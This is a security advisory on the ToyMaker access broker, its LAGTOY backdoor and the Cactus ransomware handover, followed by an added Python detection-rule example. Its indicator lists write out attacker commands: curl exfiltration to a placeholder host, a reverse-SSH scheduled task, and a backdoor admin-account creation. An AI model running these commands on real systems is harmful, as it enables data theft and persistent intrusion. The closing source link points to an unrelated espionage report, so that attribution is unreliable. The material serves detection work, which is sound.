Toymaker: The Initial Access Broker Fueling Double Extortion Ransomware Gangs


ToyMaker is an initial access broker (IAB) identified by Cisco Talos, responsible for infiltrating critical infrastructure organizations by exploiting internet-exposed vulnerabilities. Once access is gained, ToyMaker deploys a custom backdoor known as LAGTOY, which facilitates the extraction of credentials and offers backdoor access to secondary threat actors like the Cactus ransomware group. These gangs leverage the access to deploy double extortion tactics, including ransomware deployment, data theft, and extortion.

Severity Level: High

Threat Overview:

  1. Initial Compromise & Credential Extraction
    o ToyMaker exploits vulnerabilities in internet-facing servers to gain unauthorized access to the victim’s network.
    o The attack typically starts with user enumeration and preliminary reconnaissance, followed by the creation of a fake user account and the extraction of credentials using the Magnet RAM Capture tool.
  2. Deployment of LAGTOY
    o Once the system is compromised, ToyMaker deploys LAGTOY, a custom-made backdoor that facilitates reverse shell connections and remote command execution.
    o LAGTOY is installed as a Windows service that periodically polls the C2 for commands to execute on the infected endpoint. It can gather system information such as network configuration and user data, and run further malicious commands.
  3. Handover to Secondary Threat Actors
    o After approximately three weeks of inactivity, ToyMaker hands over access to Cactus, a ransomware group. Cactus takes over by conducting network enumeration and identifying additional high-value targets within the network.
  4. Data Exfiltration and Ransomware Deployment:
    o Cactus conducts extensive data exfiltration, using tools like 7zip and curl to compress and transfer sensitive files from the victim’s systems.
    o Once data is stolen, they deploy ransomware and use remote management tools such as AnyDesk, eHorus, and OpenSSH to maintain control over the compromised systems and remove traces of their activities, making detection and recovery more difficult.
  5. Double Extortion:
    o As part of the double extortion tactic, Cactus threatens to leak the stolen data unless the victim pays the ransom. The encryption of critical files, combined with the threat of public data exposure, creates significant pressure on the victim to comply with the ransom demands.

Recommendations:

  1. Ensure that all internet-facing servers are regularly patched, especially those running known vulnerable services.
  2. Disable unused remote access services, enforce strong authentication (e.g., multi-factor authentication), and regularly review access logs to identify any unauthorized access attempts.
  3. Implement account auditing practices to ensure that all user accounts are legitimate and necessary. Disable or delete unused accounts immediately.
  4. Implement immutable backups and ensure they are tested regularly for recovery. Ensure that backup files are isolated from the primary network to prevent ransomware from encrypting them.
  5. Monitor for new system processes being created, especially suspicious ones like WmiPrvSV (associated with LAGTOY).
    • Indicator: sc create WmiPrvSV start= auto error= ignore binPath= C:\Program Files\Common Files\Services\WmiPrvSV.exe
  6. Monitor for execution of PowerShell scripts, cmd.exe, or other command-line interfaces used for remote command execution. Indicator commands:
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File .\fs.ps1 result.csv
    • C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv
    • C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z hxxps://<remote_ip>:8443
    • C:\PerfLogs\Admin\7z.exe a -p<password> .\CP-SERVER3.7z .\CP-SERVER3.txt
    • C:\PerfLogs\Admin\7z.exe a -p<password> .\FILEN01.7z .\FILEN01.txt
    • C:\PerfLogs\Admin\curl.exe -k -T .\CP-SERVER3.7z hxxps://<remote_ip>:8443
    • C:\PerfLogs\Admin\curl.exe -p -k -T .\FILEN01.7z hxxps://<remote_ip>:8443
    • C:\PerfLogs\Admin\7z.exe a -p<password> .\FILE-SERVER.7z .\FILE-SERVER.txt
    • C:\PerfLogs\Admin\curl.exe -k -T .\FILE-SERVER.7z hxxps://<remote_ip>:8443
  7. Monitor the creation or modification of scheduled tasks, especially those with unusual command-line arguments or running under SYSTEM privileges. Indicator commands:
    • SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\Windows\temp\sys_log.bat > c:\Windows\temp\log.txt
    • SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@<remote_ip> -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" & timeout /t 15)
  8. Watch for the creation of new user accounts, especially ones that are added to the Administrators group (e.g., an account named "support"). Indicator commands:
    • net user support Sup0rtadmin /add
    • net localgroup administrators support /add
  9. Block the IOCs at their respective controls.
    • https://www.virustotal.com/gui/collection/be1d20e3ef2661b51af94ddd853998503a3bcc2fe2252627a3bb8a598acd5333/iocs
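The following is an added detection example, not code from Cisco Talos or from this advisory: it turns the indicator commands in the Threat Overview and the recommendations above into rules run over constructed process-creation events, and correlates the password-protected 7z archive step with the later curl upload on the same host. The event shape (host, command line), the sample command lines and the address 203.0.113.10 are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (host, command line), the shape a SIEM gets
# from Windows Event 4688 / Sysmon Event 1. 203.0.113.10 is a documentation-range placeholder.
SAMPLE_EVENTS = [
    ("srv01", r"sc create WmiPrvSV start= auto error= ignore binPath= C:\Program Files\Common Files\Services\WmiPrvSV.exe"),
    ("srv01", r"net user support Sup0rtadmin /add"),
    ("srv01", r"net localgroup administrators support /add"),
    ("fs01", r"C:\PerfLogs\Admin\7z.exe a -pS3cret .\FILE-SERVER.7z .\FILE-SERVER.txt"),
    ("fs01", r"C:\PerfLogs\Admin\curl.exe -k -T .\FILE-SERVER.7z https://203.0.113.10:8443"),
    ("ws07", r"SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c "
             r'C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@203.0.113.10 -p 443 -R 25369 -NCqf'),
    ("ws07", r"C:\Windows\System32\notepad.exe"),  # benign, must not alert
]

# Single-event rules built from the advisory's indicator commands (case-insensitive, except the ssh -R flag).
RULES = {
    "lagtoy_service_install": re.compile(r"\bsc(?:\.exe)?\s+create\s+WmiPrvSV\b", re.I),
    "local_account_created": re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I),
    "local_admin_added": re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "system_task_reverse_ssh": re.compile(r"schtasks\s+/create.*?/ru\s+system.*?\bssh(?:\.exe)?\s.*?(?-i:-R)\s+\d+", re.I),
}
ARCHIVE_RE = re.compile(r"\b7z(?:\.exe)?\s+a\s+-p\S*\s+(\S+\.7z)\b", re.I)  # 7z a -p<pwd> <name>.7z
UPLOAD_RE = re.compile(r"\bcurl(?:\.exe)?\s.*?(?-i:-T)\s+(\S+\.7z)\s+https?://\S+:8443\b", re.I)  # curl -T <name>.7z https://<ip>:8443

def single_event_alerts(events):
    """Return (host, rule) for every event whose command line matches one of RULES, in event order."""
    hits = []
    for host, cmdline in events:
        hits += [(host, name) for name, rx in RULES.items() if rx.search(cmdline)]
    return hits

def _basename(path):
    return path.replace("/", "\\").split("\\")[-1].lower()

def staged_exfil_alerts(events):
    """Correlate a password-protected 7z archive with a later curl -T upload of the same file from the same host."""
    staged = defaultdict(set)  # host -> archive basenames created so far
    hits = []
    for host, cmdline in events:
        m = ARCHIVE_RE.search(cmdline)
        if m:
            staged[host].add(_basename(m.group(1)))
            continue
        m = UPLOAD_RE.search(cmdline)
        if m and _basename(m.group(1)) in staged[host]:
            hits.append((host, "archive_then_upload", _basename(m.group(1))))
    return hits
```

The correlation rule only fires when the upload names an archive that the same host created earlier, so a lone curl upload or a 7z run without -p does not alert.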

Source:

  • https://www.security.com/threat-intelligence/billbug-china-espionage

Ampcus Cyber